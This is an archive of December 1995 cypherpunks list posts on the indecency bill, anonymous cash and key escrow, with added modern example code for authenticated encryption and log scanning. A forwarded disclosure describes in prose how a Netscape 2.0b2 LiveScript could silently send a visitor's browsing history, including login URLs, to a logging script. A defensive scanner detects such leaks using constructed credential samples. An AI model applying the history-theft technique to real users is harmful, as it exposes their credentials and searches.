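        "with_mac": open_sealed(enc_key, mac_key, altered, tag),  # rejected
        "untouched": open_sealed(enc_key, mac_key, ct, tag),      # accepted
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name:10s} {value}")
```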





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 8 Dec 95 05:13:59 PST
To: cypherpunks@toad.com
Subject: @v@ XXX
Message-ID: <199512081315.OAA20949@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Wall Street Journal, 8 Dec 1995

On-Line Society Angered by Plan to Curb Content

By Jared Sandberg

The latest move in Congress to curb "indecent" material on the
Internet triggered outrage and scorn in cyberspace, as on-line
users decried it as censorship and plotted ways to overturn
it.

"Welcome to the age of electronic book burning," said Craig
Johnson, a consultant who worries that the term "indecent"
could be applied to literary works, public health and medical
exchanges, and serious discussion of AIDS and sexual behavior.

"It's not only ridiculous - it's unfair, un-American and
unconstitutional," said Eileen Kent, vice president of new
media at Playboy Enterprises Inc. She finds it
"incomprehensible" that the on-line version of Playboy could
be deemed illegal while the printed magazine isn't. "Are they
going to send me to jail and fine me a hundred grand because
I put a Playmate on the Net?" she asked. If so, "then I'm
quitting."

House conferees hammering out a sweeping telecommunications
bill voted 17-16 on Wednesday to make it illegal for anyone to
knowingly display indecent material that can be viewed by a
minor, punishable by a $100,000 fine and up to two years in
prison.

Yesterday, critics tried to counter punch. The American Civil
Liberties Union is preparing a court challenge on First
Amendment grounds. The Center for Democracy and Technology, a
cyberspace civil-liberties group, vows to do the same. On-line
services drafted a letter of protest to House Speaker Newt
Gingrich, who has opposed earlier attempts to impose
restrictions on Internet fare.

On-line advocates also are pushing for a new vote by the House
conferees to define just what "indecency" means. They are
hoping the 17-16 balance of the first vote is tenuous enough
to allow them to ease the restrictions in defining the terms.
Backed by the hectic lobbying efforts, Rep. Rick White of
Washington state, who favors a less-restrictive approach, and
allies have begun laboring to devise a limited definition of
indecency that would be acceptable to civil libertarians and
smut-fighters alike.

Without a clearer, limited definition, the "indecency"
standard faces the almost certain prospect of being struck
down by the courts as unconstitutional, the White forces
contend.

On-line experts, moreover, argue the latest measure could
create big problems and unintended consequences. If one
16-year-old zaps lewd fare to another, could the sender be
imprisoned? If an adult makes a racy observation on an
electronic bulletin board and a minor tracks it down and reads
it, should the adult be punished?

Last week, America Online Inc., in an effort to strike
vulgarity from members' personal on-line "profiles," decided
to strike all uses of the word "breast" - and thereby erased
the biographies of scores of women who had breast cancer.

AOL "responded to the climate of fear created by Congress,"
said Mike Godwin, legal counsel for the Electronic Frontier
Foundation. An AOL spokeswoman said the deletions were "a
mistake on our part."

Robert L. Smith, executive director of the Interactive
Services Association, said such snafus could occur more and
more as Internet access providers fret about whether their
so-called content might be deemed indecent. "It's going to
cause confusion, industry uncertainty and years of litigation,
which will result in Congress not solving the problems they
wanted to solve," Mr. Smith said.

The crackdown effort, moreover, may be fruitless in a global
computer network that reaches more than 150 countries. "Those
American laws don't apply to me," said Patrick Groeneveld, a
professor at Delft University in the Netherlands. Mr.
Groeneveld, who once ran a popular Internet archive that
included pornographic material, said Congress's efforts amount
to U.S. "imperialism."

"I didn't vote for America's congressmen," he said.

"Legislators and some consumers don't understand the
Internet," said Jerry Berman, executive director of the Center
for Democracy and Technology. "So, it becomes an easy target
for political posturing."

-- Albert R. Karr contributed to this article.














From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 8 Dec 95 13:00:13 PST
To: cypherpunks@toad.com
Subject: Re: BoS: Netscape 2.0b2 allows for invasion of privacy (fwd)
Message-ID: <acede76f100210042c9a@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:33 PM 12/8/95, Bill Kuhn wrote:
>Talking of Netscape - this posting prompted me to forward it given the
>security and privacy implications inherent in the problem.
>
>Cheers
>Graeme
>
>------- Start of forwarded message -------
>>From: Scott Weston <scott@tripleg.com.au>
>>Subject: Netscape 2.0b2 allows for invasion of privacy
>>Newsgroups: aus.net.announce,comp.privacy
>>Date: Fri, 01 Dec 1995 11:09:06 +1100
>
>Hi 'Net Dwellers,

"'Net Dwellers" or "Det Weilers"? Hmmhhh....

In any case, this has already come up a couple of times on the Cypherpunks
list, and was even commented upon by Jeff Weinstein of Netscape a couple of
days ago. The bug was fixed in b3.

I really encourage people who are not following the list more carefully to
check the back traffic before posting bug reports.

Forwarding messages is often the culprit in this, as the forwarder simply
assumes we may be interested, but he has himself not been following the
thread.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael Pierson" <wfgodot@iquest.com>
Date: Fri, 8 Dec 95 12:21:20 PST
To: cypherpunks@toad.com
Subject: "Information Technology for Control of Money Laundering"
Message-ID: <199512082022.OAA18480@vespucci.iquest.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I've just finished perusing the Office of Technology Assessment's
"Information Technology for Control of Money Laundering"
<ftp://otabbs.ota.gov/pub/pdf/money.laundering/*.pdf>.  It's an
informative and fascinating document for anyone interested in the
issues of money laundering and its implications for the future of
digital currency, as well as its increasing role as an important
rationale in promoting government surveillance agendas. 

Broken into seven chapters, this document provides a valuable overview
of the subject from the government's perspective.

1. "Electronic Money Laundering" covers the ABCs of money
laundering and its connection to drug trafficking, terrorism and the
global underground economy.  It traces the relevant statutory history
from the Bank Secrecy Act of 1970 onward. 

2. "Mechanisms of Wire Transfer" examines the basics of wire transfers
and the details of the FEDWIRE, CHIPS and SWIFT systems.

3. "Money Laundering and Law Enforcement" examines the laws and 
regulations involved and the various Federal and State Agency roles
and responsibilities.

4. "Technologies for Detecting Money Laundering" is particularly
interesting.   It discusses the FinCEN Artificial Intelligence System
(FAIS), and AI approaches including Expert Systems, Link Analysis,
Neural Network techniques, Machine Learning and various statistical
modeling methods.

5. "Privacy and Confidentiality" covers different investigative
prerogatives, the legal history and case law of privacy jurisprudence,
aspects of individual and corporate confidentiality, etc...

6. "International Issues" explores off-shore banking, international
law enforcement efforts like the Financial Action Task Force (FATF)
and the subject of bilateral and multilateral cooperative agreements
and conventions.

7. "Conclusions and Policy Options" discusses money laundering and the
world economy, and various policy directions for the future as well as
the type of monitoring regimes that might be established.  It pays
particular attention to the subject of the future impact of digital
money, observing: 

 "As alternative modes of electronic payment, e.g., "digital cash",
 develop, whatever precedents are set for access to wire transfers
 might also be applied to these alternatives.  If not, digital cash,
 or "the electronic purse" may provide another channel for dirty
 money, so that monitoring of wire transfers will no longer be
 effective."

I noticed that major network news reports on the "growing threat" of
money laundering were particularly evident in close temporal
conjunction to the wide public coverage of the latest FBI CALEA
revelations.  Just coincidence, I guess...


Bonus: While your there you might want to (if you haven't yet) pick up
another OTA document entitled "Electronic Surveillance in a Digital
Age"  which provides some useful additional government position
tracking data on the legal and technical aspects of CALEA.  It's
available in both text <ftp://otabbs.ota.gov/pub/elec.surveil/*.txt>
and PDF <ftp://otabbs.ota.gov/pub/pdf/elec.surveil/*.pdf> formats. 


- -Michael


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMMidCtGJlWF+GPx9AQGROQP+KtumqozBLlFgupOCcoKRIk6udFz0jRt4
Vt1y1noiV0tJCE2XQdEGiU7KhRHDC8QX+Zi1wxVqnlhxNI8hF5g4nDGf+DHyw54r
KsXce7fJvPVZ3dn69dYIQ70gpa6BfAvsFXGAP9gnL3RxnxxYGfBknp2xdz0SiBQv
t0bnWwIab68=
=bWRK
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 8 Dec 95 14:34:17 PST
To: Mark Twain Ecash Support <support@marktwain.com>
Subject: Re: Still more on the Digicash protocol
Message-ID: <199512082234.OAA02297@ix9.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:26 PM 12/8/95 -0600, Mark Twain Bank Ecash Support wrote:
>>There's no need to send that payment info in the clear -- why not encrypt?
>
>DigiCash agrees that it is desirable to encrypt the payment request. The
>problem is how? You can't use the payor's public key, since the payor is
>anonymous to the payee. There are other, high overhead, protocols that might
>be used, but after taking MIM into account, securing the payment request
>from within Ecash while retaining acceptable latency is much harder to
>accomplish than one might think. 

Obviously if the payer is the one transmitting the message, she doesn't
use her public key to encrypt; hers would be used for signature if appropriate.
She should use the payee's public key, or some negotiated key like DH.
It doesn't lose any privacy, because she already knows an address to send
the money to, and the payee can create a public key for that address,
or some other public key he makes available to payers.

>The best solution at this time seems to be to use the already existing https
>connection to transmit the payment request. The next version of Ecash will
>offer this feature as an option to the user.

I had assumed that the payment information wasn't encrypted because that's a
separate problem from the basic digicash, and because if the payer wants
to keep the transaction private, she probably also needs to encrypt the
other side of the transaction - e.g. the request for n widgets at $d/widget.
https or other ssl connection, or an encrypted telnet, or encrypted email,
or some other protected mechanism all would seem to be appropriate.
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281

# Anybody notice that Microsoft's Wide Open Road ad has barbed-wire fences
# on both sides of the road?
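
The suggestion in the message above (encrypt to the payee's public key, or negotiate a key with DH, so the anonymous payer needs no key of her own), as an added example that is not part of the original thread and is not DigiCash's or Ecash's protocol. The function names, the HKDF label and the sample messages are assumptions made for this sketch; it uses Node's built-in crypto with X25519 and AES-256-GCM.

```javascript
const nodeCrypto = require('node:crypto');

// Both sides derive one key per direction from the DH secret. The payer's
// one-time public key doubles as HKDF salt and as AEAD associated data.
function deriveKeys(privateKey, peerPublicKey, hello) {
  const secret = nodeCrypto.diffieHellman({ privateKey, publicKey: peerPublicKey });
  const okm = Buffer.from(
    nodeCrypto.hkdfSync('sha256', secret, hello, 'example payment channel', 64));
  return { payerToPayee: okm.subarray(0, 32), payeeToPayer: okm.subarray(32) };
}

// Payer: fresh X25519 key per payment, so nothing long-term identifies her.
// Assumption: payeePublicDer is an authentic copy of the payee's key; that
// is what keeps a man-in-the-middle out of this exchange.
function payerOpenChannel(payeePublicDer) {
  const payeePublic = nodeCrypto.createPublicKey(
    { key: payeePublicDer, format: 'der', type: 'spki' });
  const oneTime = nodeCrypto.generateKeyPairSync('x25519');
  const hello = oneTime.publicKey.export({ type: 'spki', format: 'der' });
  return { hello, keys: deriveKeys(oneTime.privateKey, payeePublic, hello) };
}

// Payee: sees only the one-time public key ("hello"), never a payer identity.
function payeeAcceptChannel(payeePrivateKey, hello) {
  const payerOneTime = nodeCrypto.createPublicKey(
    { key: hello, format: 'der', type: 'spki' });
  return deriveKeys(payeePrivateKey, payerOneTime, hello);
}

// AES-256-GCM box: 12-byte IV, 16-byte tag, then ciphertext.
function seal(key, plaintext, aad) {
  const iv = nodeCrypto.randomBytes(12);
  const cipher = nodeCrypto.createCipheriv('aes-256-gcm', key, iv);
  cipher.setAAD(aad);
  const body = Buffer.concat([cipher.update(plaintext, 'utf8'), cipher.final()]);
  return Buffer.concat([iv, cipher.getAuthTag(), body]);
}

function open(key, box, aad) {
  const decipher = nodeCrypto.createDecipheriv('aes-256-gcm', key, box.subarray(0, 12));
  decipher.setAAD(aad);
  decipher.setAuthTag(box.subarray(12, 28));
  // final() throws if the box or the associated data was modified.
  return Buffer.concat([decipher.update(box.subarray(28)), decipher.final()]).toString('utf8');
}

// Constructed end-to-end run: order goes payer -> payee, request comes back.
function demo() {
  const payee = nodeCrypto.generateKeyPairSync('x25519');
  const payeePublicDer = payee.publicKey.export({ type: 'spki', format: 'der' });

  const first = payerOpenChannel(payeePublicDer);
  const second = payerOpenChannel(payeePublicDer); // a later, unrelated payment
  const shop = payeeAcceptChannel(payee.privateKey, first.hello);

  const order = seal(first.keys.payerToPayee, 'order: 3 widgets at 5.00 each', first.hello);
  const request = seal(shop.payeeToPayer, 'pay 15.00 to shop@example', first.hello);

  const tampered = Buffer.from(request);
  tampered[tampered.length - 1] ^= 1;
  let tamperRejected = false;
  try {
    open(first.keys.payeeToPayer, tampered, first.hello);
  } catch {
    tamperRejected = true;
  }

  return {
    orderAtPayee: open(shop.payerToPayee, order, first.hello),
    requestAtPayer: open(first.keys.payeeToPayer, request, first.hello),
    paymentsUnlinkable: !first.hello.equals(second.hello),
    tamperRejected,
  };
}

console.log(demo());
```

The payee can answer an anonymous payer under the derived key in either direction; what the payer must still verify out of band is that the public key really belongs to the payee.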





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Fri, 8 Dec 95 11:32:20 PST
To: jfricker@vertexgrp.com (John Fricker)
Subject: Re: Anyone know of a white paper on security?
In-Reply-To: <199512081938.LAA01395@vertex.vertexgroup.com>
Message-ID: <199512081937.OAA03591@homeport.org>
MIME-Version: 1.0
Content-Type: text


John Fricker wrote:
|     The question I'm seeking to answer is : 
| 
| What criteria should be used to determine whether a scripting
| language such as Java, LiveScript, etc. is secure? 
| 
| There are obvious issues such as access to the file system but has
| anyone thought this all the way through and codified a white paper? 

	First you need to decide what you mean by secure.  Then you
need to prove your code is correct, and conforms to the spec.  Any
high school student could do it.  :)




-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 8 Dec 95 13:19:00 PST
To: Jerry Whiting <cypherpunks@toad.com
Subject: Re: The Elevator Problem
Message-ID: <acedea6511021004dea8@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:47 PM 12/8/95, Jerry Whiting wrote:
>A group of us have been wrestling with a problem and I'd like to ask for some
>outside help.  We've come to call it the Elevator Problem.
>
>Alice and Bob want to establish a secret in front of Eve.  In other words,
>they want to agree on a secret key in an elevator full of Eves.

Isn't this just the "subliminal channels" scenario? Originally phrased in
terms of prisoners under the watchful eyes of their jailers nevertheless
establishing a private communication channel?

Schneier describes this beginning on page 66 (of his 1st edition).

Your scenario looks identical to this. So you should check out the papers
on this in the Crypto Conference proceedings.

As to whether you can implement this without using patented algorithms, I
don't know. Not enough information given.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Cooper <jcooper@virtu.sar.usf.edu>
Date: Fri, 8 Dec 95 11:59:19 PST
To: jim bell <jimbell@pacifier.com>
Subject: Re: More FUD from First Virtual
In-Reply-To: <m0tO6o4-00091AC@pacifier.com>
Message-ID: <Pine.SUN.3.91.951208145002.25221B-100000@virtu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> >I *am* skeptical about the extent to which anonymous cash *can* succeed,
> 
> What can stop it?  What should stop it?

   The US government can stop it.  It is irrelevant what *should* stop 
it, but it's extremely useful to note that the US government's political 
climate of paranoia and FUD in general will certainly not allow truly 
anonymous cash systems inside of our country in the foreseeable future.

- -jon

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMMiXeEjEaxpIF0UlAQGHggH7Bn8hrxKHsUHq0uqf7WXBxEVn4hMVofOu
HpmdmGZei4hvEwDnJ8Z8oN/BoVS5Sx4K59FItbofnRZvTn4SZAS3ug==
=rskN
-----END PGP SIGNATURE-----
 
--------------------------------------------------------
Jon Cooper 			     squeamish ossifrage




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Fri, 8 Dec 95 14:52:17 PST
To: Laszlo Vecsey <master@internexus.net>
Subject: Re: CP: Mailing List Subjects
In-Reply-To: <Pine.LNX.3.91.951208171531.16447B-100000@micro.internexus.net>
Message-ID: <Pine.ULT.3.91.951208144730.21084P-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 8 Dec 1995, Laszlo Vecsey wrote:

> Would it be possible for the Cypherpunks mailing list remailer to parse the 
> Subject line to include a CP: at the beginning, or some notation so that 
> Cypherpunk messages can be easily 'filtered' out from my Inbox?

Majordomo always includes a Sender: owner-cypherpunks@toad.com header. 
You'd know this if you used, say, Microsoft Exchange, Microsoft Mail, or
some other broken mail gateway. Procmail or whatever should be able to 
filter mail based on this.

You can also read cypherpunks courtesy of http://www.hks.net/ (no,
Cyberia-L isn't there), or nntp.hks.net. Lots of people do this. I prefer
to deal with receiving the list in my personal mailbox because I don't
like waiting for downloads in real time. 
 
> Also, about Microsoft's .PWL file format. Will they be releasing the 
> new encryption method? Or are we not supposed to feel safe that our 
> passwords are protected in Windows95.

I asked a related question of one of the networking program managers 
today; I think the answer is yes. I'll forward this to see if he'd like 
to make a public comment.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Fri, 8 Dec 95 13:17:27 PST
To: Ashfaq Rasheed <ashfaq@corp.cirrus.com>
Subject: Re:Internet Stocks
In-Reply-To: <199512081645.AA18510@sunstorm.corp.cirrus.com>
Message-ID: <9512082118.AA02278@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Ashfaq Rasheed writes:
 > Can this be made a regular feature on the list?

Yea, Tim, will you manage my portfolio for me?  I keep getting the
"buy low/sell high" rule mixed up.



[ :-) for the impaired. ]

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Fri, 8 Dec 95 15:27:59 PST
To: zen@bi.fish.com
Subject: Rally in SanFran meatspace to protest censorship in cyberspace!
Message-ID: <9512082327.AA23714@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Spread the word!

                *** NETIZENS!! RALLY AGAINST CENSORSHIP ***

Amendment I: "Congress shall make no law ... abridging the freedom of
speech, or of the press; or the right of the people peaceably to assemble."


     **PROTEST ** PROTEST ** PROTEST ** PROTEST ** PROTEST ** PROTEST **

It's like illiterates telling you what to read. On December 6 members of
the House Conference Committee on Telecommunications Reform approved a
proposal to censor free speech in cyberspace. If the measures are adopted,
the Net and online media will become the most heavily regulated media in
the United States. They *will not* enjoy the First Amendment freedoms now
afforded to print media. Instead, online publishers and users will be held
to a vague and patently un-Constitutional "indecency" standard. "Violators"
will be subject to fines of up to $100,000 and prison terms of up to five
years.

In response, ALL members of the Bay Area media, online, Internet, new
media, and telecommunications communities are invited to participate in a
protest rally to express our outrage that the politicians in Congress
(which is not even connected to the Internet!) are attempting to destroy
our First Amendment rights in cyberspace, and directly attack our
livelihoods.

Help stop the demagogs in Washington! There is nothing "decent" about
denying free speech to us, our children, and our children's children.
Preserve our Constitutional rights! Join us!

WHEN: Monday, December 11, 1995  12:00 - 1:00 PM

WHERE: South Park (between 2nd and 3rd, Bryant and Brannon) San Francisco.

SPEAKERS: To be announced  [including John Gilmore, Jim Warren, Dave
Winer, Mike Godwin, Howard Rheingold]

BRING: Attention-grabbing posters, signs, and banners that demonstrate your
commitment to free speech and expression, and your feelings about
Congress.

FOR UPDATED INFORMATION: http://www.hotwired.com/staff/digaman

(Although this event is being organized in the offices of Wired magazine
and HotWired, we are *actively* seeking participation and support from all
members of the local community. Please forward this message to anyone you
think should attend, and to all relevant news groups.)

CONTACT: Todd Lappin -- 415-222-6241 -- protest@wired.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bkuhn@scientech.com (Bill Kuhn)
Date: Fri, 8 Dec 95 12:38:23 PST
To: cypherpunks@toad.com
Subject: BoS: Netscape 2.0b2 allows for invasion of privacy (fwd)
Message-ID: <199512082033.PAA18711@rex.scientech.com>
MIME-Version: 1.0
Content-Type: text/plain



Talking of Netscape - this posting prompted me to forward it given the
security and privacy implications inherent in the problem.

Cheers
Graeme

------- Start of forwarded message -------
>From: Scott Weston <scott@tripleg.com.au>
>Subject: Netscape 2.0b2 allows for invasion of privacy
>Newsgroups: aus.net.announce,comp.privacy
>Date: Fri, 01 Dec 1995 11:09:06 +1100

Hi 'Net Dwellers,

First off - I've posted this before (however not to this group) and only
got a response from the Netscape Corp.  They were glad I found the
problem and said that they would fix it, however I feel that people
should know about it.  Also I would like people to help me spread this
document around, i.e. if you know of a newsgroup (or people) that would
find this interesting then please re-post it.

On with the problem...

I've recently got hold of the latest netscape, and was (at first) very
excited about the new "LiveScripts" that it supports.  If people don't
yet know - these "LiveScripts" allow you to put small programs into your
web page that is then executed by the Netscape client.  There is no
DIRECT way for these programs to send information back to the owner of
the web page, however I was able to do it in a not-so-direct way.

The "LiveScript" that I wrote extracts ALL the history of the current
netscape window.  By history I mean ALL the pages that you have visited
to get to my page, it then generates a string of these and forces the
Netscape client to load a URL that is a CGI script with the QUERY_STRING
set to the users History.  The CGI script then adds this information
to a log file.  Now if this hasn't quite CLICKED yet let's do a little
example.

Johnny Mnemonic starts up his newly acquired version of Netscape2.0b2
to start his daily "surf" session.  First he decides to check his CD-NOW
purchase and uses the handy Auto-Login URL.  Then he decides to go to
Lycos and do a search.  In his search he finds my page, which he decides
to visit.  Suddenly he is transported, not to my main page but to one
of my CGI scripts, which in turn happens to have ALL the URLs he's just
been to in it.  This means that in my log will be:

  - the URL to use to get into CD-NOW as Johnny Mnemonic, including
    username and password.
  - The exact search params he used on Lycos (i.e. exactly what he
    searched for)
  - plus any other places he happened to visit.

I do this in a way that the user will KNOW that it has happened and
will _hopefully_ email Netscape and tell them they are NOT impressed.
But it would be EASY for me to change the CGI script so that the user
is unaware that it has actually happened, unless they closely examine
their URL history (in fact they'll probably just think it's a netscape
bug).


If you're skeptical about this then do the test yourself.  Get netscape
2.0b2 and do some normal surfing, and then go to Lycos.  Do a search for:

  scotts car boot sale

which should return the URL - http://www.tripleg.com.au/staff/scott

Click on the URL and sit back and watch.  First my main page will show up
but a little while later you should be transported to a CGI bin script
that will show you your URL history.

I have tested this with both the Linux 2.0b2, and Solaris 2.0b2 versions
and both have done the same thing.  I would be interested in knowing if
it happens for ALL versions of Netscape2.0b2.  The log file does log
the User Agent (i.e. the name of the platform you are using) so by simply
going to the page I will know that your version of Netscape is also
open to this form of attack.

Currently I can find no way to configure Netscape2.0b2 to NOT run
LiveScripts - and at the very least this option should be quickly
added to the next version of netscape to be released.  But a far
better solution (IMHO) would be for netscape to pop up a window before
running the LiveScript and let you know what the LiveScript wants access
to, e.g. if it only wants to print out the current time then that's
OK, but if it wants to read my history list and then transport me to
a CGI script and add me to a logfile then maybe I would say NO.

I think I've said enough....

If you've got any further questions, or want some more information just
email me : scott@tripleg.com.au

--
Scott.

Quote from a car accident insurance claim: "I told the police that I was
not injured, but on removing my hat, I found that I had a skull fracture."
------- End of forwarded message -------
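
Seen from the defender's side, a history dump like the one described in the forwarded post shows up in a web or proxy log as a request whose query string carries other sites' URLs. The scanner below is an added example, not code from the post or from Netscape; the log format, the `h` parameter, the space separator, the `.example` host names and the sensitive-parameter list are all assumptions, and the log lines are constructed.

```javascript
// Query parameter names treated as sensitive (an assumed list for this example).
const SENSITIVE_PARAMS = new Set(['user', 'username', 'login', 'password', 'passwd', 'pw']);
const SEARCH_PARAMS = new Set(['q', 'query', 'search']);

// Request target from a Common Log Format line, or null if the line does not parse.
function requestTarget(line) {
  const m = /"(?:GET|POST|HEAD) (\S+) HTTP\/[\d.]+"/.exec(line);
  return m ? m[1] : null;
}

// Absolute URLs carried inside a query string, in parameter names or values.
function embeddedUrls(query) {
  const found = [];
  for (const [name, value] of new URLSearchParams(query)) {
    for (const field of [name, value]) {
      // Split before every scheme so a whole history list in one field is separated.
      for (const piece of field.split(/(?=https?:\/\/)/i)) {
        if (!/^https?:\/\//i.test(piece)) continue;
        try {
          found.push(new URL(piece.replace(/[\s,;|]+$/, '')));
        } catch {
          // Not parseable as a URL: ignore.
        }
      }
    }
  }
  return found;
}

// What a leaked URL gives away to whoever holds the log.
function exposure(url) {
  const kinds = new Set();
  if (url.username || url.password) kinds.add('credentials-in-userinfo');
  for (const name of url.searchParams.keys()) {
    const n = name.toLowerCase();
    if (SENSITIVE_PARAMS.has(n)) kinds.add('credentials-in-query');
    if (SEARCH_PARAMS.has(n)) kinds.add('search-terms');
  }
  return [...kinds];
}

// Copy of the URL that is safe to put in an alert or ticket.
function redact(url) {
  const u = new URL(url.href);
  if (u.username) u.username = 'REDACTED';
  if (u.password) u.password = 'REDACTED';
  for (const name of [...u.searchParams.keys()]) {
    if (SENSITIVE_PARAMS.has(name.toLowerCase())) u.searchParams.set(name, 'REDACTED');
  }
  return u.href;
}

// Flag requests whose query string carries URLs of hosts other than our own.
function scanAccessLog(lines, ownHost) {
  const findings = [];
  lines.forEach((line, i) => {
    const target = requestTarget(line);
    const q = target ? target.indexOf('?') : -1;
    if (q < 0) return;
    const urls = embeddedUrls(target.slice(q + 1)).filter((u) => u.hostname !== ownHost);
    if (urls.length === 0) return;
    findings.push({
      line: i + 1,
      path: target.slice(0, q),
      urls: urls.map((u) => ({ url: redact(u), exposes: exposure(u) })),
    });
  });
  return findings;
}

// Constructed sample: one history dump, one ordinary search, one same-site redirect.
const HISTORY = [
  'http://shop.example/login?user=johnny&password=hunter2',
  'http://johnny:hunter2@files.example/private/',
  'http://search.example/find?q=scotts+car+boot+sale',
];
const SAMPLE_LOG = [
  '192.0.2.10 - - [01/Dec/1995:11:09:06 +1100] "GET /index.html HTTP/1.0" 200 2048',
  `192.0.2.10 - - [01/Dec/1995:11:09:31 +1100] "GET /cgi-bin/hist.cgi?h=${encodeURIComponent(HISTORY.join(' '))} HTTP/1.0" 200 512`,
  '192.0.2.44 - - [01/Dec/1995:11:12:02 +1100] "GET /cgi-bin/search.cgi?q=car+boot+sale HTTP/1.0" 200 900',
  '192.0.2.44 - - [01/Dec/1995:11:12:40 +1100] "GET /go?next=http%3A%2F%2Fwww.site.example%2Fhome HTTP/1.0" 302 0',
];

function demoFindings() {
  return scanAccessLog(SAMPLE_LOG, 'www.site.example');
}

console.log(JSON.stringify(demoFindings(), null, 2));
```

Only the second line is reported: the plain search and the same-site redirect carry no foreign URLs, and the reported URLs are redacted so the alert does not repeat the leak.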










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Fri, 8 Dec 95 12:33:26 PST
To: Jon Cooper <jcooper@virtu.sar.usf.edu>
Subject: Re: More FUD from First Virtual
Message-ID: <2.2b8.32.19951208203419.006933d4@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:52 PM 12/8/95 -0500, Jon Cooper wrote:

>   The US government can stop it.  It is irrelevant what *should* stop 
>it, but it's extremely useful to note that the US government's political 
>climate of paranoia and FUD in general will certainly not allow truly 
>anonymous cash systems inside of our country in the foreseeable future.

But who's going to ask?  If an anonymous payment system springs up outside
the US, we can use it as a store of value if nothing else or for shopping
overseas. 
Domestically, we can convert non-anonymous payment systems into
semi-anonymous ones.  What counts is difficulty of transaction and market
demand not legal structure.  Thus, about five minutes after the "temporary
VISA card" travelers check substitutes are issued, I can start selling them
for (discounted) cash to all comers.  Likewise Ecash laundry servers letting
anonymous people use non-anonymous Ecash.

It remains to be seen how much customers value anonymity.  There should be a
niche market in any case.

DCF

"Every man his own ISP."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@mbcl.rutgers.edu>
Date: Fri, 8 Dec 95 13:34:58 PST
To: tcmay@got.net
Subject: Re: GAK and Self-Incrimination?
Message-ID: <01HYKKMGLV4Q9S3T6Q@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"tcmay@got.net"  8-DEC-1995 13:28:32.69

Given that GAK means one never knows if the government is listening, could
a person claim protection against self-incrimination as a reason to not use
GAK, and get away with it? (This is different from the phone system, which
may also be tapped. The analogy would be the same if the government forced
one to pick a telephone it could tap over one it could not, which so far
has not been the case, but which soon may be if switching systems which are
not compliant with Digital Telephony Act provisions are shut down.)

Consider this hypo: I send an encrypted message to a partner in crime
containing plans for future crimes and descriptions of past crimes. I don't
GAK the message. The government prosecutes me under the Anti-Terrorism and
Child Protection Act of 1997.

My defense? That GAKKing the message would be tantamount to incriminating
myself, which the Fifth Amendment protects me against.
-------------------
	There is the problem with this argument that personal diaries have
recently (Packwood) been found to not fall under the Fifth amendment. However,
IA(most definitely)NAL.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: winn@Infowar.Com
Date: Fri, 8 Dec 95 13:30:19 PST
To: eroberts@cmp.com
Subject: InfoWarCon
Message-ID: <199512082134.QAA23960@mailhost.IntNet.net>
MIME-Version: 1.0
Content-Type: text/plain



